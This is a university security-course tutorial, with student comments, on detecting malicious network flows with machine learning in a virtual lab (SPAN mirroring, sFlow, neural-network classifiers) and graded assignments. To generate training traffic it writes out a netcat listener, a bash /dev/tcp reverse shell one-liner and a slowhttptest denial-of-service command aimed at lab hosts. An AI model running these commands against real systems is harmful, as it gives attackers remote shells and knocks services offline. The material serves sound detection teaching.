Machine-learning-based intrusion detection

Authors: Mikhail Zolotukhin and Timo Hämäläinen

1. Introduction

In this tutorial, we will get familiar with the machine-learning-based approach of intrusion detection. First, we establish a tunnel between the gateway and alice-VM and start mirroring the traffic on LAN interface of the gateway into this tunnel. After that, we analyze this traffic with the help of machine learning models on alice-VM. To complete this tutorial, you are required to have the virtual environment we configured in previous tutorials of the course. The remainder of this tutorial is organized as follows. Several preliminary tasks are presented in Section 2. Section 3 describes how to configure a tunnel between the gateway and alice-VM. Examples of using machine learning models for intrusion detection are provided in Section 4. Assignments are listed in Section 5. Section 6 concludes the tutorial.

This tutorial (including assignments) takes on average 9.30 hours to complete.

2. Preliminary questions

What is the difference between machine learning, artificial intelligence and deep learning?
What is the difference between supervised and unsupervised machine learning?
What is bridge? what is SPAN port? What is OVS?
What is sFlow? What is the difference between sFlow and NetFlow?
Read article Detecting Reverse Shell with Machine Learning and briefly explain the detection approach used by the authors.
Briefly explain what is detection accuracy, precision, true positive rate, and false positive rate. What are other metrics that can be used for evaluation of machine learning models?

3. Mirroring traffic to SPAN port

In this section, we establish a tunnel between the gateway and alice-VM which will be used to mirror the traffic sent and received on LAN interface of the gateway.

If your gateway and/or alice-VM are currently running, shut them down.

In Virtual Box Manager, select alice-VM and open Settings. Go to Network -> Adapter 2. In "Attached to" select "Internal Network" name the new network "opt3" (or "opt3_Anonymous", if you are working one of the course's server). Next, open "Advanced" settings and, in "Promiscuous Mode", select "Allow All". Click "Ok" to save the settings.

Tip: increase CPU and RAM values for your alice-VM especially if you work on the tieskybs servers, it can be done in "Settings -> System -> Processor" and "Settings -> System -> Motherboard" respectively."

— 11 Oct 23 (edited 11 Oct 23)

We now need to add one more network adapter to the gateway-VM. Unfortunately, Virtual Box GUI does not allow for adding more than 4 network adapters. We therefore have to use console. The commands in Linux terminal would look as follows (again, remember that if you are using one of the course's servers, you need to substitute the network name "opt3" in the commands below with "opt3_Anonymous"):
```
$ vboxmanage modifyvm gateway --nic5 intnet
```
```
$ vboxmanage modifyvm gateway --intnet5 opt3
```
The same can be done in Windows command prompt as follows:
```
$ "C:\\Program Files\Oracle\VirtualBox\VBoxManage" modifyvm gateway --nic5 intnet
```
```
$ "C:\\Program Files\Oracle\VirtualBox\VBoxManage" modifyvm gateway --intnet5 opt3
```

Once editing has been completed, restart VirtualBox manager just in case, then start the following VMs: gateway, dnsserv, alice-VM, bob-VM and kali-VM.

In pfSense web configurator, go to Interfaces -> Assignments, find network port "em4" in "Available network ports" and click "+ Add". Next, go to Interfaces -> OPT3, click "Enable", scroll down, click "Save", then "Apply Changes".

After that, go to Interfaces -> Assignments (OPT3 should be there now) and select Bridges. Click "+ Add" and in "Member Interfaces" select "LAN". Click "Display Advanced", in "SPAN Port" select "OPT3", scroll to the bottom and click "Save". In "Interface assignments", find the bridge in "Available network ports" and click "Add".

Next, go to Interfaces -> OPT4, put check mark into box "Enable interface", click "Save", then "Apply Changes". This will enable the bridge we just created. It will use OPT3 interface as a SPAN port to which LAN traffic will be mirrored.

In alice-VM terminal execute the following command to install OVS:
```
$ sudo apt install openvswitch-switch
```

Add a new bridge in OVS:
```
$ sudo ovs-vsctl add-br br
```
and add the second network interface we added earlier on alice-VM to this bridge:
```
$ sudo ovs-vsctl add-port br enp0s8
```
Set interface "enp0s8" link up:
```
$ sudo ip link set enp0s8 up
```
Keep in mind that the result of the last "ip link" command above is not persistent, meaning that if you decide to reboot your VM somewhere in the middle of the tutorial, you have to run this last command again, otherwise enp0s8 will remain down and you will not be able to capture the traffic.

Stumbled into this issue later. If you dont have the interface up and running the script to capture traffic will cause 100% CPU use and terminal will crash.

— 19 Sep 23

If you have done everything correct by this point, you will now be able to capture packets transferred via LAN interface of the gateway on alice-VM's interface "enp0s8". Let's test that this is working as expected. In alice-VM, start capturing packets with tcpdump as follows:
```
$ sudo tcpdump -i enp0s8 host 192.168.10.102
```
where "192.168.10.102" is bob-VM's IP address (which can actually be different in your case).

In bob-VM's browser, go to any website, e.g. https://192.168.11.2/accounts (webserv-VM should probably be up to do this). In case of success, you should see lots of traffic printed in the terminal on alice-VM and either the source or the destination of the packets is equal to the bob-VM's IP, i.e. 192.168.10.102. Please make sure this part is working as expected before moving to the next section. In case of success, stop capturing by pressing Ctrl+C.

webserv-VM does not need to be up to see packages flow. #- But of course the page won't load :)

— 18 Sep 23

Not sure if this was an isolated issue, but I could not detect any traffic with sflow collector, if I didn't have webserv-vm up and running. TCPdump worked fine and everything else ran smoothly.

— 11 Oct 23

Webserv should be up if you want to generate some meaningful traffic netween bob and webserv, otherwise there will only be some SYN packets every now and then. If you go to another website from bob then obviously there will be lots of traffic and you do not need the webserv to be running for that :)

— 11 Oct 23 (edited 11 Oct 23)

Tip: if you do not see any traffic when running this tcpdump command, check post 41 in the chat, and double-check every thing that is mentioned there: interface names, bob's ip, allow all, etc.

— 11 Oct 23

4. Detecting malicious flows with machine learning

As a rule, machine learning (ML) includes two stages: training and inference. During the former, a machine learning model is trained using data examples available. This machine learning model is essentially a function with thousands (or even millions) of trainable parameters which accepts some data (features) as the input and returns some data (labels) as the output.

Thus, training an ML model can be defined as follows: given an input and an output data examples, adjust the model parameters (weights). The ML inference is the opposite: given the model trained and examples of new input data, predict the corresponding output labels. In our example, the input data is the traffic on the gateway's LAN interface which we capture on alice-VM, and the output label is type of the traffic: legitimate or malicious.

In order to apply the approach described, first, we need to collect some data examples for the training. In this tutorial, we will use sFlow to extract data from the switch and send it for further processing. In order to add an sFlow agent on alice-VM's OVS, run:
```
$ sudo ovs-vsctl -- --id=@sflow create sflow target="\"localhost:6343\"" sampling=1 
polling=1 -- set bridge br sflow=@sflow
```
Explanation for sampling and polling parameters can be found here.

"Page not found" on Wed Sep 27 2023 13:53. It's archived on wayback machine though; https://web.archive.org/web/20220704152052/https://www.plixer.com/blog/what-is-sflow-how-do-i-understand-it/ (checked Wed Sep 27 2023)

— 27 Sep 23

thanks, I subbed the link with another one; basically you can just google "sflow sampling vs polling" and read the first link if interested; not really important for the assignment though

— 29 Sep 23 (edited 29 Sep 23)

Download the package with Python scripts we will use for ML training and inference:
```
$ wget http://@/files/ml_ids.zip
```
and extract the content:
```
$ unzip ml_ids.zip
```

Install python3-pip on alice-VM:
```
$ sudo apt install python3-pip
```
and then install Python packages needed to run the scripts:
```
$ pip3 install numpy pandas torch
```

If you're on a slow internet (e.g. faculty servers), installing torch will take a looong time as it downloads several gigabytes of dependencies and itself.

— 10 Oct 23

I do not think the internet is slow on faculty servers; it is rather networking in VMs which is extremely slow there...

Edit: you can switch the 1st alice's network adapter to NAT, run this "pip install" command, then switch back to internal "lan_username". You should not even need to restart the VM when switching network adapter.

The problem is internal networking through pfsense works 20 times slower than default NAT on tieskybs servers, I dunno why, on my local pc, the data rate is more or less the same...

— 11 Oct 23 (edited 11 Oct 23)

Change directory to "ml_ids":
```
$ cd ml_ids
```
Further in the tutorial, it is assumed that we are in this directory.

First, to parse sFlow samples, run the collector:
```
$ python3 sflow_collector.py
```
To test that it is working as expected, on bob-VM generate some HTTP or HTTPS traffic, e.g. by opening a web site in the browser. In case of success, you should observe data printed in the terminal on alice-VM. Each sample in the data includes timestamp, source IP address, source port, destination IP address, destination port and size of the packet.

If there is no output, please check again that you actually see Bob's traffic when running:
```
$ sudo tcpdump -i enp0s8 host 192.168.10.102
```
One more weird thing that may take place (happened to me when testing in Ubuntu 22.04) is the terminal crash, in this case the output will not be shown until you press some key, sometimes it freezes, and shows the result in chunks. In this case, just close the terminal and open a new one.

In the case of success, stop the collector by pressing Ctrl+C.

Had to run the collector multiple times in different terminals before it started capturing. So if everything seems correct just try again (and again.)

— 05 Oct 23

For the sake of demonstration, in this tutorial, we will pipe several python scripts together directly in our terminal, so that we can observe the result of each step of the data processing pipeline. This is obviously not how you would do it in a real life use case :) Let's connect output of the sFlow collector to the next script to extract features needed for the data analysis:
```
$ python3 sflow_collector.py | python3 extract_features.py
```
If IP addresses in your virtual network environemnt are not the same as the ones used in the tutorials, the scripts may not work. To make them work, open file "config.py" in the same directory "ml_ids", find parameters "subnet" and "attacker_ip" and edit them so that they correspond to IP addresses in your network.

Again, generate some HTTP or HTTPS traffic on bob-VM, and observe the result in alice-VM's terminal. The last script in the command above first combines packets with the same IP addresses and ports extracted from sFlow samples into connections. Connection information is contained in the first four items of the comma separated lines printed. The rest of the elements in each line corresponds to features extracted from each such connection. In this tutorial, we use some of the CIC-IDS features from Table 3. Press Ctrl+C to stop the extraction process.

If IP addresses in your environemnt are not the same as used in the tutorials, the scripts may not work. To make it work, open file "config.py" in the same directory "ml_ids", find parameters "subnet" and "attacker_ip" and edit them according to IPs in your network.

Edit: for 99% of students it should work as it is, i.e. you do not need to edit anything; this is only for students who for example change subnet IPs on the gateway in the beginning of the course, becasue of some issues.

— 07 Oct 23 (edited 07 Oct 23)

Next we need to label the feature vectors extracted. Since we are going to generate malicious traffic only from kali-VM, we can label all the corresponding traffic as malicious simply by looking at IP addresses of the communicating hosts. The rest of the traffic can be labeled as normal:
```
$ python3 sflow_collector.py | python3 extract_features.py | python3 create_dataset.py
```

To test that it is working as expected, start a reverse shell connection between bob-VM and kali-VM. For this purpose, in the terminal of kali-VM, run:
```
$ nc -lvnp 443 -s 192.168.12.2
```
and in bob-VM's terminal:
```
$ /bin/bash -l > /dev/tcp/192.168.12.2/443 0<&1 2>&1
```
Execute some commands in the reverse shell obtained on kali-VM, e.g. "ls", "pwd", "whoami", "uname -a", "cd ", "cat ", etc. When doing this, check the last number of each line in the output printed in the terminal on alice-VM. In case of success, there should be samples with "1" at the end. There can also be samples with "0" at the end which correspond to some normal traffic generated by bob-VM's background processes, that is ok. Press Ctrl+C in kali-VM's terminal to stop the reverse shell.

Now we can generate a dataset to train an ML model. For this purpose, in the terminal of alice-VM, first, start capturing data samples (the command below is one line):
```
$ python3 sflow_collector.py | python3 extract_features.py | python3 create_dataset.py >  
shell_train.csv
```
After that, generate some malicious data as explained in the previous step, i.e. start netcat listener using port 443 on kali-VM, after that, from bob-VM, connect to this listener using the bash command to establish a reverse shell, then execute some Linux commands in the reverse shell. Generate malicious traffic for 2-3 minutes. During the process, you can also occasionally quit the shell by typing "exit" or simply pressing Ctrl+C, and then establish a new one.

In order to generate legitimate traffic, open the web browser on bob-VM, and browse several sites, e.g. make some random Google search requests or open YouTube and click several videos. Spend 1-2 minutes to generate some normal web traffic.

When you feel like you have had enough, return to the terminal on alice-VM and stop the traffic capturing.

Check few first lines of file "shell_train.csv":
```
$ head shell_train.csv
```
there should be feature vectors which end with "1", i.e. malicious flows.

You can count the number of lines in that file using wc tool:
```
$ wc -l shell_train.csv
```
Alternatively, you can use "check_dataset.py" script in the "ml_ids" directory:
```
$ python3 check_dataset.py -d shell_train.csv 
```
There should be at least 100 attack samples, but the bigger the better obviously. If needed, you can capture more traffic and append it to the same file by substituting ">" with ">>" in the previous step command.

If you have done everything right by this point, you can now train a supervised machine learning model to distinguish reverse shell connections from normal web traffic:
```
$ python3 train_supervised.py -d shell_train.csv
```

Once the model has been trained, test it using CSV file "shell_test.csv" located in the same directory:
```
$ python3 test_supervised.py -d shell_test.csv
```
This file contains 128 samples in total: 64 normal and 64 malicious ones. Check the evaluation metric values. Does the model classify the flows accurately?

Finally, you can test the resulting model for online detection, by first executing on alice-VM:
```
$ python3 sflow_collector.py | python3 extract_features.py | python3 ids_supervised.py
```
Next, establish a reverse shell between bob-VM and the attacker. On alice-VM, check probability values returned by the model for the corresponding connection.

5. Assignment

5.1 Preliminary

Complete the test based on the preliminary questions (1 point).

# mlid_basic11

# mlid_basic12

# mlid_basic13

5.2 Basic

In file "config.py", find ML parameters (last section):

layers
validation_split
dropout
learning_rate
batch_size
epochs
patience

Artificial neural networks have two main hyperparameters that control the architecture (or topology) of the network: the number of hidden layers and the number of neurons in each hidden layer. In file config.py, we use list of integers "layers" to represent these two hyperparameters: each integer in the list corresponds to the number of the neurons in the corresponding layer.

Find information about other parameters present in the configuration file and complete the test below.

# mlid_basic3

Test the scripts used for reverse shell connection detection with several different values of the aforementioned parameters found in "config.py": layers, validation split, etc. For this purpose, use commands from steps 11 - 12.

The order of your actions should be the following:

Change parameter values in "config.py".

Train a new model:

$ python3 train_supervised.py -d shell_train.csv

Test the model trained using the test file provided:
```
$ python3 test_supervised.py -d shell_test.csv
```
Check the metric values. If not satisfied, go back to the first step.
If you think that your model is now quite accurate, run the test script against the assignment data file:
```
$ python3 test_supervised.py -d shell_assignment.csv -o shell_predictions.txt
```
Upload the file with predictions, i.e. "shell_predictions.txt", to the answer box below.

The number of your points will be calculated as follows: (np.clip(accuracy - 0.5, 0, 0.5)) * 2 which means that if the accuracy is below 50% (random chance), no points will be given.

Tip: if no matter what parameter values you use, the accuracy does not increase, your training dataset might be poor. In this case, you can try to generate more training samples and append them to the dataset as explained in the tutorial.

The file with answers should contain 1024 labels (0.0 or 1.0) separated by a comma. Running "wc -c" against the file with predictions should output 4096 (4 bytes per each label). Double-check this before uploading!

Reverse shell detection (1 point):

I have 100% accuracy with my model but TIM awards 0.984375 points. Is there a bug?

— 18 Sep 23

no, why? 0.984 is a good result; you can try to generate more samples for your training dataset if you want to improve the score

Just to clarify, the full test dataset contains 1024 + 128 samples, 128 of which are in the shell_test.csv with labels and another 1024 - in shell_assignment.csv without labels obviously; the split was random, the accuracy values should not differ much.

— 19 Sep 23 (edited 25 Sep 23)

# mlid_basic4

How to get full 1 point in the assignment? I got 100% Accuracy with 100% true positive rate and 0.0% False positive rate and still no full 1 point. I thought that's perfect score or have I missed something?

— 11 Oct 23

you kidding, right? :)

— 11 Oct 23

Read about such deep learning models as autoencoder and deep support vector data description and complete the test below.

# mlid_basic5

You can try to employ our implementation of the deep SVDD model mentioned using scripts "train_unsupervised.py" and "test_unsupervised.py" which are the scripts for training and testing the model. They can be found in the same directory as all other scripts used during the tutorial. The scripts can be used in exactly the same way as their supervised counterparts.

5.3 Advanced

Generate a new dataset as it was described in the tutorial, but only using normal traffic from bob-VM to the Internet. Generate at least 2000 normal samples, the number of attack ones should remain zero.

After that, start the webserv-VM. In pfSense web configurator, go to Interfaces -> Assignments -> Bridges. In member interfaces of our bridge BRIDGE0, select OPT1 and save changes. Use the scripts given in the tutorial to extract and collect features from malicious traffic flows generated with the help of SlowHttpTest from kali-VM:

$ slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://192.168.11.2/accounts/
index.php -x 24 -p 3

You can either append new samples to the file with normal data generated few moments ago, or save them in a new file. In the latter case, you should pass both files to the python scripts which require "-d" argument, e.g.:

$ python3 check_dataset.py -d file1.csv file2.csv

In your case, csv file names can obviously be different.

The assignment is the same as the basic one:

Train a model (supervised or unsupervised) using the dataset you created, as previously test multiple parameter combinations to find the best one.
Evaluate the resulting models using file "slowhttp_test.csv".
Once the accuracy is high enough, test your model against the assignment file "slowhttp_assignment.csv" to generate predictions.
Upload the file with your predictions in the answer box below.

The number of predictions should be 4096, running "wc -c <file_with_predictions>" should return 4 times that.

SlowHTTP DoS detection (2 points):

# mlid_advanced

5.4 General comments and feedback

Let us know how many hours in total have you spent on this assignment:

# mlid_time

On a scale from 1 to 10, estimate how interesting and difficult was the tutorial:

# mlid_interest

# mlid_difficulty

You can also give us some general feedback:

# mlid_feedback

6. Conclusion

In this tutorial, we got familiar with bridging, SPAN, OVS and sFLow. After that, we employed the machine-learning-based approach for intrusion detection.

More information on the topic can be found at:

Machine-learning-based intrusion detection

1. Introduction

2. Preliminary questions

3. Mirroring traffic to SPAN port

4. Detecting malicious flows with machine learning

5. Assignment

5.1 Preliminary

5.2 Basic

5.3 Advanced

5.4 General comments and feedback

6. Conclusion

7. Comments